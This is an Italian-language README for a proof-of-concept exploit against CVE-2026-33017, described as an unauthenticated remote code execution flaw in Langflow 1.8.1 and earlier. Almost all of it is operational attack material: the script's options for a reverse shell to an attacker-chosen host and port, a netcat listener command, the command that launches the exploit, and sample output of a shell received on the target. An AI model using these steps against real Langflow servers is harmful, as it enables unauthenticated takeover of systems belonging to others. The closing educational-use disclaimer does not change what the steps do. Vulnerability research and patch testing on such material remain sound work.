
Proof-of-concept exploit per CVE-2026-33017 (Langflow <= 1.8.1).
Langflow <= 1.8.1 è vulnerabile a una RCE remota, non autenticata (https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target
PoC exploit: CVE-2026-33017
positional arguments:
target Hostname del target
options:
-h, --help mostra questo messaggio di aiuto ed esce
--lhost LHOST Indirizzo IP di destinazione per la reverse shell
--lport LPORT Porta di destinazione per la reverse shell
# Crea un'istanza docker
docker run -d -p 7860:7860 langflowai/langflow:1.8.1
# Avvia il listener
nc -lnvp 4444
# Lancia l'exploit
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444
# Dovresti ricevere la reverse shell nel listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
Questo progetto è fornito esclusivamente a scopo educativo e di ricerca. L'autore non è responsabile per un uso improprio o per danni causati da questo codice.